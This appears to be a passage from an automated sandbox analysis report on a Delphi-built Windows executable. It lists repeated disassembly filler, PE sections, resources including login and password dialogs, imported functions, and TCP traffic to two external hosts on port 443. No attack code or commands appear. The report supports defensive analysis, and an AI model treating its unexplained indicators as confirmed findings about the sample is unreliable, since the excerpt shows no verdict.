                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al

                                                                                                          Data Directories

                                                                                                          NameVirtual AddressVirtual Size Is in Section
                                                                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x830000x22b0.idata
                                                                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x910000xb1400.rsrc
                                                                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x13ae000x54c0.rsrc
                                                                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x880000x8138.reloc
                                                                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_TLS0x870000x18.rdata
                                                                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                          Sections

                                                                                                          NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                          CODE0x10000x7c17c0x7c200False0.522454053374data6.55138199518IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                                          DATA0x7e0000x29540x2a00False0.412109375data4.92006813937IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                                          BSS0x810000x114d0x0False0empty0.0IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                                          .idata0x830000x22b00x2400False0.355251736111data4.85312153514IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                                          .tls0x860000x100x0False0empty0.0IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                                          .rdata0x870000x180x200False0.05078125data0.206920017787IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                                                                                                          .reloc0x880000x81380x8200False0.584435096154data6.65713214053IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                                                                                                          .rsrc0x910000xb14000xb1400False0.549846008903data7.13567802778IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ

                                                                                                          Resources

                                                                                                          NameRVASizeTypeLanguageCountry
                                                                                                          RT_CURSOR0x9217c0x134data
                                                                                                          RT_CURSOR0x922b00x134data
                                                                                                          RT_CURSOR0x923e40x134data
                                                                                                          RT_CURSOR0x925180x134data
                                                                                                          RT_CURSOR0x9264c0x134data
                                                                                                          RT_CURSOR0x927800x134data
                                                                                                          RT_CURSOR0x928b40x134data
                                                                                                          RT_BITMAP0x929e80x1d0data
                                                                                                          RT_BITMAP0x92bb80x1e4data
                                                                                                          RT_BITMAP0x92d9c0x1d0data
                                                                                                          RT_BITMAP0x92f6c0x1d0data
                                                                                                          RT_BITMAP0x9313c0x1d0data
                                                                                                          RT_BITMAP0x9330c0x1d0data
                                                                                                          RT_BITMAP0x934dc0x1d0data
                                                                                                          RT_BITMAP0x936ac0x1d0data
                                                                                                          RT_BITMAP0x9387c0x1d0data
                                                                                                          RT_BITMAP0x93a4c0x1d0data
                                                                                                          RT_BITMAP0x93c1c0x5cdata
                                                                                                          RT_BITMAP0x93c780x5cdata
                                                                                                          RT_BITMAP0x93cd40x5cdata
                                                                                                          RT_BITMAP0x93d300x5cdata
                                                                                                          RT_BITMAP0x93d8c0x5cdata
                                                                                                          RT_BITMAP0x93de80x138data
                                                                                                          RT_BITMAP0x93f200x138data
                                                                                                          RT_BITMAP0x940580x138data
                                                                                                          RT_BITMAP0x941900x138data
                                                                                                          RT_BITMAP0x942c80x138data
                                                                                                          RT_BITMAP0x944000x138data
                                                                                                          RT_BITMAP0x945380x104data
                                                                                                          RT_BITMAP0x9463c0x138data
                                                                                                          RT_BITMAP0x947740x104data
                                                                                                          RT_BITMAP0x948780x138data
                                                                                                          RT_BITMAP0x949b00xe8GLS_BINARY_LSB_FIRSTEnglishUnited States
                                                                                                          RT_ICON0x94a980x468GLS_BINARY_LSB_FIRSTEnglishUnited States
                                                                                                          RT_ICON0x94f000x988dataEnglishUnited States
                                                                                                          RT_ICON0x958880x10a8dataEnglishUnited States
                                                                                                          RT_ICON0x969300x25a8dataEnglishUnited States
                                                                                                          RT_ICON0x98ed80x4228dBase IV DBT of \200.DBF, blocks size 0, block length 16896, next free block index 40, next free block 240, next used block 251658240EnglishUnited States
                                                                                                          RT_ICON0x9d1000x5488dataEnglishUnited States
                                                                                                          RT_ICON0xa25880x94a8dataEnglishUnited States
                                                                                                          RT_ICON0xaba300xa2a8dataEnglishUnited States
                                                                                                          RT_DIALOG0xb5cd80x52data
                                                                                                          RT_STRING0xb5d2c0x280data
                                                                                                          RT_STRING0xb5fac0x274data
                                                                                                          RT_STRING0xb62200x1ecdata
                                                                                                          RT_STRING0xb640c0x13cdata
                                                                                                          RT_STRING0xb65480x2c8data
                                                                                                          RT_STRING0xb68100xfcHitachi SH big-endian COFF object file, not stripped, 17664 sections, symbol offset=0x65007200, 83907328 symbols, optional header size 28672
                                                                                                          RT_STRING0xb690c0xf8data
                                                                                                          RT_STRING0xb6a040x128data
                                                                                                          RT_STRING0xb6b2c0x468data
                                                                                                          RT_STRING0xb6f940x37cdata
                                                                                                          RT_STRING0xb73100x39cdata
                                                                                                          RT_STRING0xb76ac0x3e8data
                                                                                                          RT_STRING0xb7a940xf4data
                                                                                                          RT_STRING0xb7b880xc4data
                                                                                                          RT_STRING0xb7c4c0x2c0data
                                                                                                          RT_STRING0xb7f0c0x478data
                                                                                                          RT_STRING0xb83840x3acdata
                                                                                                          RT_STRING0xb87300x2d4data
                                                                                                          RT_RCDATA0xb8a040x10data
                                                                                                          RT_RCDATA0xb8a140x398data
                                                                                                          RT_RCDATA0xb8dac0x494Delphi compiled form 'TLoginDialog'
                                                                                                          RT_RCDATA0xb92400x3c4Delphi compiled form 'TPasswordDialog'
                                                                                                          RT_RCDATA0xb96040x76f67GIF image data, version 89a, 577 x 188EnglishUnited States
                                                                                                          RT_RCDATA0x13056c0x11a42Delphi compiled form 'T__958758541'
                                                                                                          RT_GROUP_CURSOR0x141fb00x14Lotus unknown worksheet or configuration, revision 0x1
                                                                                                          RT_GROUP_CURSOR0x141fc40x14Lotus unknown worksheet or configuration, revision 0x1
                                                                                                          RT_GROUP_CURSOR0x141fd80x14Lotus unknown worksheet or configuration, revision 0x1
                                                                                                          RT_GROUP_CURSOR0x141fec0x14Lotus unknown worksheet or configuration, revision 0x1
                                                                                                          RT_GROUP_CURSOR0x1420000x14Lotus unknown worksheet or configuration, revision 0x1
                                                                                                          RT_GROUP_CURSOR0x1420140x14Lotus unknown worksheet or configuration, revision 0x1
                                                                                                          RT_GROUP_CURSOR0x1420280x14Lotus unknown worksheet or configuration, revision 0x1
                                                                                                          RT_GROUP_ICON0x14203c0x76dataEnglishUnited States
                                                                                                          RT_MANIFEST0x1420b40x2f0XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States

                                                                                                          Imports

                                                                                                          DLLImport
                                                                                                          kernel32.dllDeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, InitializeCriticalSection, VirtualFree, VirtualAlloc, LocalFree, LocalAlloc, GetTickCount, QueryPerformanceCounter, GetVersion, GetCurrentThreadId, InterlockedDecrement, InterlockedIncrement, VirtualQuery, WideCharToMultiByte, MultiByteToWideChar, lstrlenA, lstrcpynA, LoadLibraryExA, GetThreadLocale, GetStartupInfoA, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetCommandLineA, FreeLibrary, FindFirstFileA, FindClose, ExitProcess, WriteFile, UnhandledExceptionFilter, RtlUnwind, RaiseException, GetStdHandle
                                                                                                          user32.dllGetKeyboardType, LoadStringA, MessageBoxA, CharNextA
                                                                                                          advapi32.dllRegQueryValueExA, RegOpenKeyExA, RegCloseKey
                                                                                                          oleaut32.dllSysFreeString, SysReAllocStringLen, SysAllocStringLen
                                                                                                          kernel32.dllTlsSetValue, TlsGetValue, LocalAlloc, GetModuleHandleA
                                                                                                          advapi32.dllRegQueryValueExA, RegOpenKeyExA, RegCloseKey
                                                                                                          kernel32.dlllstrcpyA, lstrcmpiA, WriteFile, WaitForSingleObject, VirtualQuery, VirtualProtect, VirtualAlloc, Sleep, SizeofResource, SetThreadLocale, SetFilePointer, SetEvent, SetErrorMode, SetEndOfFile, ResetEvent, ReadFile, MultiByteToWideChar, MulDiv, LockResource, LoadResource, LoadLibraryA, LeaveCriticalSection, InitializeCriticalSection, GlobalUnlock, GlobalReAlloc, GlobalHandle, GlobalLock, GlobalFree, GlobalFindAtomA, GlobalDeleteAtom, GlobalAlloc, GlobalAddAtomA, GetVersionExA, GetVersion, GetTickCount, GetThreadLocale, GetSystemInfo, GetStringTypeExA, GetStdHandle, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLocalTime, GetLastError, GetFullPathNameA, GetDiskFreeSpaceA, GetDateFormatA, GetCurrentThreadId, GetCurrentProcessId, GetCPInfo, GetACP, FreeResource, InterlockedExchange, FreeLibrary, FormatMessageA, FindResourceA, EnumCalendarInfoA, EnterCriticalSection, DeleteCriticalSection, CreateThread, CreateFileA, CreateEventA, CompareStringA, CloseHandle
                                                                                                          version.dllVerQueryValueA, GetFileVersionInfoSizeA, GetFileVersionInfoA
                                                                                                          gdi32.dllUnrealizeObject, StretchBlt, SetWindowOrgEx, SetWinMetaFileBits, SetViewportOrgEx, SetTextColor, SetStretchBltMode, SetROP2, SetPixel, SetEnhMetaFileBits, SetDIBColorTable, SetBrushOrgEx, SetBkMode, SetBkColor, SelectPalette, SelectObject, SelectClipRgn, SaveDC, RestoreDC, Rectangle, RectVisible, RealizePalette, Polyline, PlayEnhMetaFile, PatBlt, MoveToEx, MaskBlt, LineTo, IntersectClipRect, GetWindowOrgEx, GetWinMetaFileBits, GetTextMetricsA, GetTextExtentPoint32A, GetSystemPaletteEntries, GetStockObject, GetROP2, GetPolyFillMode, GetPixel, GetPaletteEntries, GetObjectA, GetMapMode, GetEnhMetaFilePaletteEntries, GetEnhMetaFileHeader, GetEnhMetaFileBits, GetDeviceCaps, GetDIBits, GetDIBColorTable, GetDCOrgEx, GetCurrentPositionEx, GetClipBox, GetBrushOrgEx, GetBitmapBits, GdiFlush, ExcludeClipRect, DeleteObject, DeleteEnhMetaFile, DeleteDC, CreateSolidBrush, CreatePenIndirect, CreatePalette, CreateHalftonePalette, CreateFontIndirectA, CreateDIBitmap, CreateDIBSection, CreateCompatibleDC, CreateCompatibleBitmap, CreateBrushIndirect, CreateBitmap, CopyEnhMetaFileA, BitBlt
                                                                                                          user32.dllCreateWindowExA, WindowFromPoint, WinHelpA, WaitMessage, UpdateWindow, UnregisterClassA, UnhookWindowsHookEx, TranslateMessage, TranslateMDISysAccel, TrackPopupMenu, SystemParametersInfoA, ShowWindow, ShowScrollBar, ShowOwnedPopups, ShowCursor, SetWindowsHookExA, SetWindowTextA, SetWindowPos, SetWindowPlacement, SetWindowLongA, SetTimer, SetScrollRange, SetScrollPos, SetScrollInfo, SetRect, SetPropA, SetParent, SetMenuItemInfoA, SetMenu, SetForegroundWindow, SetFocus, SetCursor, SetClassLongA, SetCapture, SetActiveWindow, SendMessageA, ScrollWindow, ScreenToClient, RemovePropA, RemoveMenu, ReleaseDC, ReleaseCapture, RegisterWindowMessageA, RegisterClipboardFormatA, RegisterClassA, RedrawWindow, PtInRect, PostQuitMessage, PostMessageA, PeekMessageA, OffsetRect, OemToCharA, MessageBoxA, MapWindowPoints, MapVirtualKeyA, LoadStringA, LoadKeyboardLayoutA, LoadIconA, LoadCursorA, LoadBitmapA, KillTimer, IsZoomed, IsWindowVisible, IsWindowEnabled, IsWindow, IsRectEmpty, IsIconic, IsDialogMessageA, IsChild, InvalidateRect, IntersectRect, InsertMenuItemA, InsertMenuA, InflateRect, GetWindowThreadProcessId, GetWindowTextA, GetWindowRect, GetWindowPlacement, GetWindowLongA, GetWindowDC, GetTopWindow, GetSystemMetrics, GetSystemMenu, GetSysColorBrush, GetSysColor, GetSubMenu, GetScrollRange, GetScrollPos, GetScrollInfo, GetPropA, GetParent, GetWindow, GetMenuStringA, GetMenuState, GetMenuItemInfoA, GetMenuItemID, GetMenuItemCount, GetMenu, GetLastActivePopup, GetKeyboardState, GetKeyboardLayoutList, GetKeyboardLayout, GetKeyState, GetKeyNameTextA, GetIconInfo, GetForegroundWindow, GetFocus, GetDesktopWindow, GetDCEx, GetDC, GetCursorPos, GetCursor, GetClipboardData, GetClientRect, GetClassNameA, GetClassInfoA, GetCapture, GetActiveWindow, FrameRect, FindWindowA, FillRect, EqualRect, EnumWindows, EnumThreadWindows, EndPaint, EnableWindow, EnableScrollBar, EnableMenuItem, DrawTextA, DrawMenuBar, DrawIconEx, DrawIcon, DrawFrameControl, DrawEdge, DispatchMessageA, DestroyWindow, DestroyMenu, DestroyIcon, DestroyCursor, DeleteMenu, DefWindowProcA, DefMDIChildProcA, DefFrameProcA, CreatePopupMenu, CreateMenu, CreateIcon, ClientToScreen, CheckMenuItem, CallWindowProcA, CallNextHookEx, BeginPaint, CharNextA, CharLowerBuffA, CharLowerA, CharUpperBuffA, CharToOemA, AdjustWindowRectEx, ActivateKeyboardLayout
                                                                                                          kernel32.dllSleep
                                                                                                          oleaut32.dllSafeArrayPtrOfIndex, SafeArrayPutElement, SafeArrayGetElement, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayGetUBound, SafeArrayGetLBound, SafeArrayCreate, VariantChangeType, VariantCopyInd, VariantCopy, VariantClear, VariantInit
                                                                                                          ole32.dllCoUninitialize, CoInitialize
                                                                                                          oleaut32.dllGetErrorInfo, SysFreeString
                                                                                                          comctl32.dllImageList_SetIconSize, ImageList_GetIconSize, ImageList_Write, ImageList_Read, ImageList_GetDragImage, ImageList_DragShowNolock, ImageList_SetDragCursorImage, ImageList_DragMove, ImageList_DragLeave, ImageList_DragEnter, ImageList_EndDrag, ImageList_BeginDrag, ImageList_Remove, ImageList_DrawEx, ImageList_Draw, ImageList_GetBkColor, ImageList_SetBkColor, ImageList_ReplaceIcon, ImageList_Add, ImageList_SetImageCount, ImageList_GetImageCount, ImageList_Destroy, ImageList_Create, InitCommonControls

                                                                                                          Possible Origin

                                                                                                          Language of compilation systemCountry where language is spokenMap
                                                                                                          EnglishUnited States

                                                                                                          Network Behavior

                                                                                                          Network Port Distribution

                                                                                                          TCP Packets

                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                          Nov 28, 2020 10:27:38.393749952 CET49731443192.168.2.4162.159.128.233
                                                                                                          Nov 28, 2020 10:27:38.410197020 CET44349731162.159.128.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.410366058 CET49731443192.168.2.4162.159.128.233
                                                                                                          Nov 28, 2020 10:27:38.411195993 CET49731443192.168.2.4162.159.128.233
                                                                                                          Nov 28, 2020 10:27:38.427740097 CET44349731162.159.128.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.427881956 CET49731443192.168.2.4162.159.128.233
                                                                                                          Nov 28, 2020 10:27:38.511373997 CET49732443192.168.2.4162.159.135.233
                                                                                                          Nov 28, 2020 10:27:38.527805090 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.527992964 CET49732443192.168.2.4162.159.135.233
                                                                                                          Nov 28, 2020 10:27:38.533566952 CET49732443192.168.2.4162.159.135.233
                                                                                                          Nov 28, 2020 10:27:38.549958944 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.551420927 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.551466942 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.551489115 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.551557064 CET49732443192.168.2.4162.159.135.233
                                                                                                          Nov 28, 2020 10:27:38.602339983 CET49732443192.168.2.4162.159.135.233
                                                                                                          Nov 28, 2020 10:27:38.618768930 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.624269962 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.676007986 CET49732443192.168.2.4162.159.135.233
                                                                                                          Nov 28, 2020 10:27:38.714512110 CET49732443192.168.2.4162.159.135.233
                                                                                                          Nov 28, 2020 10:27:38.730875969 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.748243093 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.748271942 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.748286009 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.748294115 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.748311043 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.748321056 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.748344898 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.748369932 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.748368025 CET49732443192.168.2.4162.159.135.233
                                                                                                          Nov 28, 2020 10:27:38.748388052 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.748413086 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.748421907 CET49732443192.168.2.4162.159.135.233
                                                                                                          Nov 28, 2020 10:27:38.748437881 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.748456001 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.748481035 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.748493910 CET49732443192.168.2.4162.159.135.233
                                                                                                          Nov 28, 2020 10:27:38.748497963 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.748518944 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.748533964 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.748544931 CET49732443192.168.2.4162.159.135.233
                                                                                                          Nov 28, 2020 10:27:38.748548985 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.748567104 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.748583078 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.748596907 CET49732443192.168.2.4162.159.135.233
                                                                                                          Nov 28, 2020 10:27:38.748598099 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.748616934 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.748635054 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.748651028 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.748663902 CET49732443192.168.2.4162.159.135.233
                                                                                                          Nov 28, 2020 10:27:38.748668909 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.748686075 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.748703003 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.748719931 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.748723984 CET49732443192.168.2.4162.159.135.233
                                                                                                          Nov 28, 2020 10:27:38.748735905 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.748759031 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.748784065 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.748786926 CET49732443192.168.2.4162.159.135.233
                                                                                                          Nov 28, 2020 10:27:38.748811007 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.748835087 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.748838902 CET49732443192.168.2.4162.159.135.233
                                                                                                          Nov 28, 2020 10:27:38.748857975 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.748878002 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.748897076 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.748919964 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.748931885 CET49732443192.168.2.4162.159.135.233
                                                                                                          Nov 28, 2020 10:27:38.748944998 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.748967886 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.748994112 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.749001980 CET49732443192.168.2.4162.159.135.233
                                                                                                          Nov 28, 2020 10:27:38.749021053 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.749041080 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.749052048 CET49732443192.168.2.4162.159.135.233
                                                                                                          Nov 28, 2020 10:27:38.749063015 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.749083996 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.749103069 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.749108076 CET49732443192.168.2.4162.159.135.233
                                                                                                          Nov 28, 2020 10:27:38.749125957 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.749146938 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.749170065 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.749175072 CET49732443192.168.2.4162.159.135.233
                                                                                                          Nov 28, 2020 10:27:38.749201059 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.749224901 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.749227047 CET49732443192.168.2.4162.159.135.233
                                                                                                          Nov 28, 2020 10:27:38.749247074 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.749267101 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.749281883 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.749298096 CET49732443192.168.2.4162.159.135.233
                                                                                                          Nov 28, 2020 10:27:38.749300957 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.749322891 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.749344110 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.749358892 CET49732443192.168.2.4162.159.135.233
                                                                                                          Nov 28, 2020 10:27:38.749363899 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.749437094 CET49732443192.168.2.4162.159.135.233
                                                                                                          Nov 28, 2020 10:27:38.765702009 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.765732050 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.765748978 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.765767097 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.765784025 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.765805006 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.765830040 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.765842915 CET49732443192.168.2.4162.159.135.233
                                                                                                          Nov 28, 2020 10:27:38.765853882 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.765877008 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.765889883 CET49732443192.168.2.4162.159.135.233
                                                                                                          Nov 28, 2020 10:27:38.765899897 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.765923023 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.765932083 CET49732443192.168.2.4162.159.135.233
                                                                                                          Nov 28, 2020 10:27:38.765948057 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.765955925 CET49732443192.168.2.4162.159.135.233
                                                                                                          Nov 28, 2020 10:27:38.765971899 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.765989065 CET49732443192.168.2.4162.159.135.233
                                                                                                          Nov 28, 2020 10:27:38.765994072 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.766012907 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.766030073 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.766047955 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.766056061 CET49732443192.168.2.4162.159.135.233
                                                                                                          Nov 28, 2020 10:27:38.766064882 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.766083002 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.766099930 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.766103983 CET49732443192.168.2.4162.159.135.233
                                                                                                          Nov 28, 2020 10:27:38.766119003 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.766130924 CET49732443192.168.2.4162.159.135.233
                                                                                                          Nov 28, 2020 10:27:38.766140938 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.766159058 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.766163111 CET49732443192.168.2.4162.159.135.233
                                                                                                          Nov 28, 2020 10:27:38.766175985 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.766191959 CET49732443192.168.2.4162.159.135.233
                                                                                                          Nov 28, 2020 10:27:38.766194105 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.766217947 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.766241074 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.766242027 CET49732443192.168.2.4162.159.135.233
                                                                                                          Nov 28, 2020 10:27:38.766267061 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.766278028 CET49732443192.168.2.4162.159.135.233
                                                                                                          Nov 28, 2020 10:27:38.766288996 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.766315937 CET44349732162.159.135.233192.168.2.4
